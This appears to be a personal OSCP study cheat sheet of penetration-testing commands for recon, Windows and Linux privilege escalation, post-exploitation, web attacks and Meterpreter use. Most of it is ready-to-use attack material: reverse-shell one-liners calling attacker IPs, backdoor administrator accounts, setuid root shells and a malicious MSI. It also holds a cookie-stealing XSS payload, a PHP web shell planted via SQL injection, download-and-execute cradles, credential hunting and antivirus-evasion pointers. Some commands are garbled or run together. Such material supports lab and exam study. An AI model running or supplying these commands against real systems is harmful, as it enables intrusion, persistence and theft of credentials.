USEFULL OSCP MATERIAL

1.Various Tricks

Upgrading simple shells to fully interactive TTYs

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

Temporary Web Server

python -m SimpleHTTPServerpython3 -m http.serverruby -rwebrick -e “WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start”php -S 0.0.0.0:8888

Use Nmap to remotely execute commands through SQL

nmap -Pn -n -sS –script=ms-sql-xp-cmdshell.nse <victim_ip> -p1433 –script-args mssql.username=sa,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd=”net user backdoor backdoor123 /add”nmap -Pn -n -sS –script=ms-sql-xp-cmdshell.nse 10.11.1.31 -p1433 –script-args mssql.username=<sql_user>,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd=”net localgroup administrators backdoor /add”

Make browser appear as a search engine
Use curl (serch engine agents: googlebot, slurp, msnbot…)

curl -A “‘Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)’)” ‘http://<victim_ip>/robots.txt’

Change headers of a http request using curl
Example: check for shellshock vulnerability: (PoC: ‘() { :; }; echo “CVE-2014-6271 vulnerable”’ bash -c id )

curl -H ‘User-Agent: () { :; }; echo “CVE-2014-6271 vulnerable” bash -c id’ http://10.11.1.71/cgi-bin/admin.cgi

Execute process as another user (with credentials)

Create a ps1 file e.g. run.ps1 with powershell commands as below:

secpasswd = ConvertTo-SecureString “<admin_pass_clear_text>” -AsPlainText -Force

$mycreds = New-Object System.Management.Automation.PSCredential (“<Admin_username>”, $secpasswd)

$computer = “<COMPUTER_NAME>”

[System.Diagnostics.Process]::Start(“C:/users/public/<reverse_shell.exe>”,””, $mycreds.Username, mycreds.Password, $computer)

Upload run.ps1 to victim’s machine
Execute powershell command:

powershell -ExecutionPolicy Bypass -File c:\users\public\run.ps1

Get a root shell from MySQL

https://infamoussyn.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/

Setuid binary for root shell

#include <stdio.h>

#include <sys/types.h>

#include <unistd.h>

int main(void)

{

setuid(0); setgid(0); system(“/bin/bash”);

}

Alternatively

#include <stdio.h>

#include <unistd.h>

main()

{

setuid(0);

execl(“/bin/sh”,”sh”,0);

printf(“You are root”);

}

gcc -o rootme rootme.c

chown root:root && chmod 4777 /var/tmp/rootme

Alternatively

cp /bin/sh /tmp/root_shell; chmod a+s /tmp/root_shell;

/tmp/root_shell -p

Leverage xp_cmdshell to get a shell

sqsh -S <ip_address> -U sa -P <password>

exec sp_configure ‘show advanced options’, 1

reconfigure

exec sp_configure ‘xp_cmdshell’, 1

reconfigure

xp_cmdshell ‘dir C:\’

Bypassing white-listing

http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html

Create small shellcode

msfvenom -p windows/shell_reverse_tcp -a x86 -f python –platform windows LHOST=<ip> LPORT=443 -b “\x00” EXITFUNC=thread –smallest -e x86/fnstenv_mov

2.RECON

Use datasploit as a Recon framework

https://github.com/DataSploit/datasploit

Run web scanners

dirb http{s}://<ip_address>:<port> /usr/share/wordlist/dirb/{common/small/vulns}.txt gobuster -u http://10.11.1.71/ -w /usr/share/seclists/Discovery/Web_Content/common.txt -s ‘200,204,301,302,307,403,500’ -egobuster -u http://10.11.1.71/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s ‘200,204,301,302,307,403,500’ -egobuster -u http://10.11.1.71/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s ‘200,204,403,500’ -e nikto -port {web ports} -host <ip_address> -o <output file.txt>

Use /usr/share/seclists/Discovery for some good word lists

Check for SMB vulnerabilities
We don’t want to run smb-brute or smb-flood because they might lock out accounts or cause a DoS to the services

nmap -p139,445 -T4 -oN smb_vulns.txt -Pn –script not brute and not dos and smb-* -vv -d 10.11.1.1-254

3.Window Privilege Escalation

Information Gathering

+ What system are we connected to?

systeminfo | findstr /B /C:”OS Name” /C:”OS Version”

+ Get the hostname and username (if available)

hostnameecho %username%

+ Learn about your environment

SETecho %PATH%

List other users on the box

net usersnet user <username>

Networking/Routing Info

ipconfig /allroute printarp -A

Active Network Connections

netstat -ano

Firewall Status (only on Win XP SP2 and above)

netsh firewall show statenetsh firewall show confignetsh advfirewall firewall show rule all

Scheduled tasks

schtasks /query /fo LIST /v

+ Check how Running processes link to started services

tasklist /SVC

+ Windows services that are started:

net start

+ Driver madness (3rd party drivers may have holes)

DRIVERQUERY

Check systeminfo output against exploit-suggester

https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.pypython windows-exploit-suggester.py -d 2017-05-27-mssb.xls -i systeminfo.txt

+ Run windows-privesc script

https://github.com/pentestmonkey/windows-privesc-check

WMIC

Windows Management Instrumentation Command Line
Windows XP requires admin

+ Use wmic_info.bat script for automation

http://www.fuzzysecurity.com/tutorials/files/wmic_info.rar

+ System Info

wmic COMPUTERSYSTEM get TotalPhysicalMemory,captionwmic CPU Get /Format:List

+ Check patch level

wmic qfe get Caption,Description,HotFixID,InstalledOn

Look for privilege escalation exploits and look up their respective KB patch numbers. Such exploits include, but are not limited to, KiTrap0D (KB979682), MS11-011 (KB2393802), MS10-059 (KB982799), MS10-021 (KB979683), MS11-080 (KB2592799)
After enumerating the OS version and Service Pack you should find out which privilege escalation vulnerabilities could be present. Using the KB patch numbers you can grep the installed patches to see if any are missing
Search patches for given patch

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:”KB..” /C:”KB..”

Examples:

Windows 2K SP4 – Windows 7 (x86): KiTrap0D (KB979682)

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:”KB979682″

Windows Vista/2008 6.1.6000 x32,Windows Vista/2008 6.1.6001 x32,Windows 7 6.2.7600 x32,Windows 7/2008 R2 6.2.7600 x64. (no good exploit – unlikely Microsoft Windows Vista/7 – Elevation of Privileges (UAC Bypass))

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:”KB2393802″

Stored Credentials

Directories that contain the configuration files (however better check the entire filesystem). These files either contain clear-text passwords or in a Base64 encoded format.
C:\sysprep.inf3. C:\sysprep\sysprep.xml4. %WINDIR%\Panther\Unattend\Unattended.xml

%WINDIR%\Panther\Unattended.xml

When the box is connected to a Domain:

Look for Groups.xml in SYSVOL
GPO preferences can be used to create local users on domain. So passwords might be stored there. Any authenticated user will have read access to this file. The passwords is encryptes with AES. But the static key is published on the msdn website. Thus it can be decrypted.
Search for other policy preference files that can have the optional “cPassword” attribute set:

Services\Services.xml: Element-Specific AttributesScheduledTasks\ScheduledTasks.xml: Task Inner Element, TaskV2 Inner Element, ImmediateTaskV2 Inner ElementPrinters\Printers.xml: SharedPrinter ElementDrives\Drives.xml: Element-Specific AttributesDataSources\DataSources.xml: Element-Specific Attributes

Automated Tools

Metasploit Module

post/windows/gather/credentials/gpppost/windows/gather/enum_unattend

Powersploit

https://github.com/PowerShellMafia/PowerSploitGet-GPPPasswordGet-UnattendedInstallFileGet-WebconfigGet-ApplicationHostGet-SiteListPasswordGet-CachedGPPPasswordGet-RegistryAutoLogon

4 Search filesystem:

Search for specific keywords:

dir /s *pass* == *cred* == *vnc* == *.config*

Search certain file types for a keyword

findstr /si password *.xml *.ini *.txt

Search for certain files

dir /b /s unattend.xml

dir /b /s web.config

dir /b /s sysprep.inf

dir /b /s sysprep.xml

dir /b /s *pass*

dir /b /s vnc.ini

Grep the registry for keywords (e.g. “passwords”)

reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s

reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon”

reg query “HKLM\SYSTEM\Current\ControlSet\Services\SNMP”

reg query “HKCU\Software\SimonTatham\PuTTY\Sessions”

reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

Find writeable files
dir /a-r-d /s /b
/a is to search for attributes. In this case r is read only and d is directory. The minus signs negate those attributes. So we’re looking for writable files only.
/s means recurse subdirectories

III. /b means bare format. Path and filename only.

Trusted Service Paths

1.List all unquoted service paths (minus built-in Windows services) on our compromised machine:

wmic service get name,displayname,pathname,startmode |findstr /i “Auto” |findstr /i /v “C:\Windows\\” |findstr /i /v “””

Suppose we found:

C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe

If you look at the registry entry for this service with Regedit you can see the ImagePath value is:

C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe

To be secure it should be like this:

“C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe”

When Windows attempts to run this service, it will look at the following paths in order and will run the first EXE that it will find:

C:\Program.exeC:\Program Files.exeC:\Program Files(x86)\Program Folder\A.exe…

Check permissions of folder path

icacls “C:\Program Files (x86)\Program Folder”

If we can write in the path we plant a backdoor with the same name with the service and restart the service.

Metasploit module:

exploit/windows/local/trusted_service_path

Vulnerable Services

Search for services that have a binary path (binpath) property which can be modified by non-Admin users – in that case change the binpath to execute a command of your own.

Note: Windows XP shipped with several vulnerable built-in services.

Use accesschk from SysInternals to search for these vulnerable services.

https://technet.microsoft.com/en-us/sysinternals/bb842062.aspx

For Windows XP, version 5.2 of accesschk is needed:

https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exeaccesschk.exe -uwcqv “Authenticated Users” * /accepteulaaccesschk.exe -qdws “Authenticated Users” C:\Windows\ /accepteulaaccesschk.exe -qdws Users C:\Windows\

Then query the service using Windows sc:

sc qc <vulnerable service name>

Then change the binpath to execute your own commands (restart of the service will most likely be needed):

sc config <vuln-service> binpath= “net user backdoor backdoor123 /add” sc stop <vuln-service>sc start <vuln-service>sc config <vuln-service> binpath= “net localgroup Administrators backdoor /add” sc stop <vuln-service>sc start <vuln-service>

Note – Might need to use the depend attribute explicitly:

sc stop <vuln-service>sc config <vuln-service> binPath= “c:\inetpub\wwwroot\runmsf.exe” depend= “” start= demand obj= “.\LocalSystem” password= “”sc start <vuln-service>

Metasploit module:

exploit/windows/local/service_permissions

AlwaysInstallElevated

AlwaysInstallElevated is a setting that allows non-privileged users the ability to run Microsoft Windows Installer Package Files (MSI) with elevated (SYSTEM) permissions.

Check if these 2 registry values are set to “1”:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If they are, create your own malicious msi:

msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi

Then use msiexec on victim to execute your msi:

msiexec /quiet /qn /i C:\evil.msi

Metasploit module:

exploit/windows/local/always_install_elevated

Bypassing AV

Use Veil-Evasion
Create your own executable by “compiling” PowerShell scripts
Use Metasploit to substitute custom EXE and MSI binaries. You can set EXE::Custom or MSI::Custom to point to your binary prior to executing the module.

Getting GUI

+ Using meterpreter, inject vnc session:

run post/windows/manage/payload_inject payload=windows/vncinject/reverse_tcp lhost=<yourip> options=viewonly=false

+ Enable RDP:

netsh firewall set service RemoteDesktop enablereg add “HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /freg add “hklm\system\currentControlSet\Control\Terminal Server” /v “AllowTSConnections” /t REG_DWORD /d 0x1 /f

sc config TermService start= autonet start Termservicenetsh.exefirewalladd portopening TCP 3389 “Remote Desktop”

OR:

netsh.exe advfirewall firewall add rule name=”Remote Desktop – User Mode (TCP-In)” dir=in action=allow program=”%%SystemRoot%%\system32\svchost.exe” service=”TermService” description=”Inbound rule for the Remote Desktop service to allow RDP traffic. [TCP 3389] added by LogicDaemon’s script” enable=yes profile=private,domain localport=3389 protocol=tcpnetsh.exe advfirewall firewall add rule name=”Remote Desktop – User Mode (UDP-In)” dir=in action=allow program=”%%SystemRoot%%\system32\svchost.exe” service=”TermService” description=”Inbound rule for the Remote Desktop service to allow RDP traffic. [UDP 3389] added by LogicDaemon’s script” enable=yes profile=private,domain localport=3389 protocol=udp

OR (meterpreter)

run post/windows/manage/enable_rdp

https://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/

Python exploits

Compiling Python Exploits for Windows on Linux

install pyinstaller of windows with wine on Kali and then

wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe –onefile 18176.py

run `pyinstaller` located under the same directory as Python scripts

wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe –onefile HelloWorld.py

Execute with wine

wine ~/.wine/drive_c/dist/HelloWorld.exe

File Transfers

limit commands on shell to be non-interactive

https://blog.netspi.com/15-ways-to-download-a-file/

TFTP

Windows XP and Win 2003 contain tftp client. Windows 7 do not by default

tfpt clients are usually non-interactive, so they could work through an obtained shell

atftpd –daemon –port 69 /tftpWindows> tftp -i 192.168.30.45 GET nc.exe

FTP

Windows contain FTP client but they are usually interactive

Solution: scripted parameters in ftp client: ftp -s

ftp-commands

echo open 192.168.30.5 21> ftp.txtecho USER username password >> ftp.txtecho bin >> ftp.txtecho GET evil.exe >> ftp.txtecho bye >> ftp.txtftp -s:ftp.txt

VBScript

wget-vbs script echo trick again, copy paste the commands in the shell

echo strUrl = WScript.Arguments.Item(0) > wget.vbsecho StrFile = WScript.Arguments.Item(1) >> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbsecho Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbsecho Err.Clear >> wget.vbsecho Set http = Nothing >> wget.vbsecho Set http = CreateObject(“WinHttp.WinHttpRequest.5.1”) >> wget.vbs

echo If http Is Nothing Then Set http = CreateObject(“WinHttp.WinHttpRequest”) >> wget.vbsecho If http Is Nothing Then Set http = CreateObject(“MSXML2.ServerXMLHTTP”) >> wget.vbsecho If http Is Nothing Then Set http = CreateObject(“Microsoft.XMLHTTP”) >> wget.vbsecho http.Open “GET”,strURL,False >> wget.vbsecho http.Send >> wget.vbsecho varByteArray = http.ResponseBody >> wget.vbsecho Set http = Nothing >> wget.vbsecho Set fs = CreateObject(“Scripting.FileSystemObject”) >> wget.vbsecho Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbsecho strData = “” >> wget.vbsecho strBuffer = “” >> wget.vbsecho For lngCounter = 0 to UBound(varByteArray) >> wget.vbsecho ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbsecho Next >> wget.vbsecho ts.Close >> wget.vbs

cscript wget.vbs http://10.11.0.102/evil.exe test.txt

Powershell

echo $storageDir = $pwd > wget.ps1echo $webclient = New-Object System.Net.WebClient >>wget.ps1echo $url = “http://10.11.0.102/powerup.ps1” >>wget.ps1echo $file = “powerup.ps1” >>wget.ps1echo $webclient.DownloadFile($url,$file) >>wget.ps1powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Webdav

On kali linux install wsgidav and cheroot

pip install wsgidav cheroot

Start the wsgidav on a restricted folder:

mkdir /tmp/webdav_folderwsgidav –host=0.0.0.0 –port=80 –root=/tmp/webdav_folder

On Windows mount this folder using net use:

net use * http://YOUR_IP_ADDRESS/

Reference: https://github.com/mar10/wsgidav

BitsAdmin

bitsadmin /transfer n http://domain/file c:%homepath%file

debug.exe

First use upx or similar to compress the executable:

upx -9 nc.exe

Then use exe2bat to convert the executable into a series of echo commands that are meant to be copied pasted in the remote system:

wine exe2bat.exe nc.exe nc.txt

Then copy paste each command from nc.txt in the remote system. The commands will gradually rebuild the executable in the target machine.

certuril

certutil.exe -URL will fetch ANY file and download it here: C:\Users\subTee\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content

Resources

https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py

http://www.fuzzysecurity.com/tutorials/16.html

http://www.greyhathacker.net/?p=738

https://toshellandback.com/2015/11/24/ms-priv-esc/

https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/

https://www.toshellandback.com/2015/08/30/gpp/

https://www.toshellandback.com/2015/09/30/anti-virus/

https://www.veil-framework.com/framework/veil-evasion/

https://www.toshellandback.com/2015/11/24/ms-priv-esc/

https://null-byte.wonderhowto.com/how-to/hack-like-pro-use-powersploit-part-1-evading-antivirus-software-0165535/

https://pentestlab.blog/2017/04/19/stored-credentials/

4.Window Post Exploitation

Backdoor User

net user backdoor backdoor123 /addnet localgroup administrators backdoor /addnet localgroup “Remote Desktop Users” backdoor /add

Enabling RDP

netsh firewall set service RemoteDesktop enable

reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /freg add “hklm\system\currentControlSet\Control\Terminal Server” /v “AllowTSConnections” /t REG_DWORD /d 0x1 /f

sc config TermService start= autonet start Termservicenetsh.exefirewalladd portopening TCP 3389 “Remote Desktop”

OR:

etsh.exe advfirewall firewall add rule name=”Remote Desktop – User Mode (UDP-In)” dir=in action=allow program=”%%SystemRoot%%\system32\svchost.exe” service=”TermService” description=”Inbound rule for the Remote Desktop service to allow RDP traffic. [UDP 3389] added by LogicDaemon’s script” enable=yes profile=private,domain localport=3389 protocol=udp

OR (meterpreter)

run post/windows/manage/enable_rdp

https://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/

Dumping Credentials

https://adsecurity.org/?page_id=1821

in order to prevent the “clear-text” password from being placed in LSASS, the following registry key needs to be set to “0” (Digest Disabled):

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)

This registry key is worth monitoring in your environment since an attacker may wish to set it to 1 to enable Digest password support which forces “clear-text” passwords to be placed in LSASS on any version of Windows from Windows 7/2008R2 up to Windows 10/2012R2. Windows 8.1/2012 R2 and newer do not have a “UseLogonCredential” DWORD value, so it would have to be created. The existence of this key on these systems may indicate a problem.

Remote Commands

winexe –user=backdoor%laKK195@19z //10.11.1.218 ipconfigwinexe –user=backdoor%laKK195@19z –system //10.11.1.218 cmd

psexec (from Windows)

nmap -sU -sS –script smb-psexec.nse –script-args=smbuser=<username>,smbpass=<password>[,config=<config>] -p U:137,T:139 <host>

5.Linux Privilege Escalation

Information Gathering

+ Get OS information

cat /etc/issuecat /etc/*-releasecat /proc/versionuname -arpm -q kerneldmesg | grep Linuxls /boot | grep vmlinuz-lsb_release -a

+ Check sudoers

sudo -l cat /etc/sudoers

Check password files
Check for misconfigurations – i.e Is shadow readable? Is passwd writeable?

cat /etc/passwdcat /etc/shadowls -l /etc/passwdls -l /etc/shadow

+ Learn your environment
Search for misconfigured PATH variables. Do they prioritize searching for executable files from a non-secure (i.e. world-writeable) path?

cat /etc/profilecat /etc/bashrccat ~/.bash_profilecat ~/.bashrccat ~/.bash_logoutcat ~/.bash_historyenvset

Check history files
You might find plaintext passwords in there

cat ~/.*_history

+ Check cronjobs
Search for jobs using programs that run with root privileges and are potentially write-accessible by low-privileged users

crontab -lls -alh /var/spool/cronls -al /etc/ | grep cronls -al /etc/cron*cat /etc/cron*cat /etc/at.allowcat /etc/at.denycat /etc/cron.allowcat /etc/cron.denycat /etc/crontabcat /etc/anacrontabcat /var/spool/cron/crontabs/root

+ Check processes running as root for vulnerabilities

ps aux | grep rootps -ef | grep root

Search files for plaintext credentials

grep -ir user *grep -ir pass *

+ Find writable configuration files

find /etc/ -writable -type f 2>/dev/null

+ Run privesc scripts

LinEnum – https://www.rebootuser.com/?p=1758linuxprivchecker.py – http://www.securitysift.com/download/linuxprivchecker.pyunix-privesc-check – https://github.com/pentestmonkey/unix-privesc-check

Escaping jail shells

python -c ‘import pty;pty.spawn(“/bin/bash”)’ echo os.system(‘/bin/bash’)/bin/sh -i

Resources

https://www.kernel-exploits.com/

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

6.Linux Post Exploitation

Backdooring Linux

+ Adding a backdoor user (super visible to sysadmin)

Adding users

/usr/sbin/adduser backdoorpasswd backdoorecho “backdoor ALL=(ALL) ALL” >> /etc/sudoers

+ Plant a rootkit (might make system unstable)

Userland rootkits

+ more stable
+ more likely to remain planted after system updates
– more visible
– less control

Kernel rootkits

+ less visible
+ complete control
– more unstable
– more likely to cause problems with system updates

https://github.com/n1nj4sec/pupyhttps://github.com/r00tkillah/HORSEPILLhttp://r00tkit.me/

Resources

http://pentestmonkey.net/blog/post-exploitation-without-a-tty

https://www.blackhat.com/docs/us-16/materials/us-16-Leibowitz-Horse-Pill-A-New-Type-Of-Linux-Rootkit.pd

7.Web Applications

General

Try reading the php source code of the web application:

http://<ip>/script.php/?-s

Do you see any LFI/RFI vulnerability posted by Nikto? Try

fimap -u <ip-address>

Check for Input Validation in forms:

1′ or 1=1 limit 1;# AND 1′ or 1=1–)

Stealing Cookies

http://10.11.0.5/reportnew Image().src=”http://10.11.0.5/bogus.php?output=”+document.cookie;

File Inclusion Vulnerabilities

php.ini values:

register_globalsallow_url allow_url_fopenallow_url_include

terminate our request with a null byte () (possible in php below 5.3)

For LFI/RFI attacks, this might be useful:

https://github.com/lightos/Panoptic/

Contaminating Log Files

contaminate log file to cause them to contain PHP code to be later used in LFI attack

nv -nv 192.168.30.35 80<?php echo shell_exec($_GET[‘cmd’]);?>

thus, cmd= is introduced into the php execution and now by including the logfile you can execute any command

SQL Injection

Classic Authentication Bypass

select * from users where name =’any’ or 1=1;#’ select * from users where name =’any’ or 1=1 limit 1;#’

Error Based Enum

order by

union all operator → allows us to add our own select queries to the original but the new select needs to have the same number of columns as the original columns statement

union all select 1,2,3,4,5,6union all select 1,2,3,4,@@version,6union all select 1,2,3,4,user(),6union all select 1,2,3,4,table_name,6 FROM information_schema.tablesunion all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name=’users’union select 1,2,name,4,password,6 FROM users

http://10.11.1.35/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a,password),6 FROM users

Blind SQL Injection

and 1=1;#and 1=2;#

if they have different results then it is an indication of possible injection spot

use time as a test parameter for query

sleep(5)select IF(MID(@@version,1,1) = ‘5’, SLEEP(5), 0);union all select 1,2,3,4,load_file(“c:/windows/system32/drivers/etc/hosts”),6

http://10.11.1.35/comment.php?id=738 union all select 1,2,3,4,”<?php echo shell_exec($_GET[‘cmd’]);?>”,6 into OUTFILE ‘c:/xampp/htdocs/backdoor.php’

SQLMap

sqlmap -u http://192.168.30.35 –crawl=1sqlmap -u http://192.168.30.35/comment.php?id=738 –dbms=mysql –dump –threads=5sqlmap -u http://192.168.30.35/comment.php?id=738 –dbms=mysql –os-shell

Modify HTTP Headers

Install addon “Modify Headers”

In some cases, to look like you have a different IP, you can change the value of the X-Forwarded-For

https://docs.alertlogic.com/userGuides/web-security-manager-premier-preserve-IP-address.htm

Meterpreter

Basic Commands

sysinfogetpidgetuidps ps -S notepad.exe kill <pid>ipconfigroutemigrate <PID>getsystemgetprivsuse privhashdumpshellbackground

File System Commands

lspwdcddel <file>cat <file>edit <file>upload <src_file> <dst_file>download <src_file> <dst_file>getwdgetlwd

Port Forwarding

We have compromised victim1 with meterpreter session_id. Background meterpreter and add the route below. It will redirect all traffic for the above victim2_subnet through victim1.

route add <victim2 subnet> <netmask> <session_id> route -hroute listroute delete <victim2_subnet> <netmask> <session+id>

Forwards traffic from port l on Kali(localhost) to port p of Target2 through the compromised Target1

portfwdportfwd add -l 1111 -p 2222 -r Target2portfwd remove -l 1111 -p 2222 -r Target2

Execute Processes

Execute cmd.exe and interact with it

execute -f cmd.exe -i

Execute cmd.exe with all available tokens

execute -f cmd.exe -i -t

Execute cmd.exe with all available tokens and make it a hidden process

execute -f cmd.exe -i -H -t

H Create the process hidden from view
a Arguments to pass to the command
i Interact with the process after creating it
m Execute from memory
t Execute process with currently impersonated thread token

Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory

run <scriptname>

Registry

Interact, create, delete, query, set, and much more in the target’s registry

reg <Command> [OPTIONS]

commands:

enumkey ->Enumerate the supplied registry keycreatekey / deletekey -> Creates/deletes the supplied registry keysetval / queryval -> Set/query values from the supplied registry keyOptions: -d -> Data to store in the registry value -k -> The registry key -v -> The registry value name

Tokens

use incognitolist_tokens -ulist_tokens -gimpersonate_token DOMAIN_NAME\\USERNAMEsteal_token PIDdrop_tokenrev2self

Sniffing

use sniffersniffer_interfacessniffer_dump interfaceID pcapnamesniffer_start interfaceID packet-buffersniffer_stats interfaceIDsniffer_stop interfaceID

Post Exploitation

add_user username password -h ipadd_group_user “Domain Admins” username -h ipclearavtimestompscreenshotkeyscan_startkeyscan_dumpkeyscan_stopuictl enable keyboard/mousesetdesktop numberrebootrun post/windows/manager/enable_rdp

Run msfmap

Download it from http://code.google.com/p/msfmapload msfmapmsfmap

References

https://pentestlab.blog/2012/03/26/meterpreter-commands/

https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/

https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

SHELLS

bash -i >& /dev/tcp/10.11.0.102/8080 0>&1rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/fperl -e ‘use Socket;$i=”10.11.0.102″;$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.11.0.102”,80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

always check for nc, nc.traditional or netcat, or ncat with the full path if plain nc doesn’t work!

RESOURCES

https://github.com/enddo/awesome-windows-exploitation

https://theslickgeek.com/oscp/

https://blog.g0tmi1k.com/archives/

https://blog.g0tmi1k.com/2011/07/pentesting-with-backtrack-pwb/

https://github.com/SynAckPwn23/Go-For-OSCP

https://forums.offensive-security.com/showthread.php?t=5961

https://www.youtube.com/watch?v=vg9cNFPQFqM

http://www.thegreycorner.com/p/vulnserver.html

https://www.vulnhub.com/entry/kioptrix-2014-5,62/

https://www.vulnhub.com/entry/fristileaks-13,133/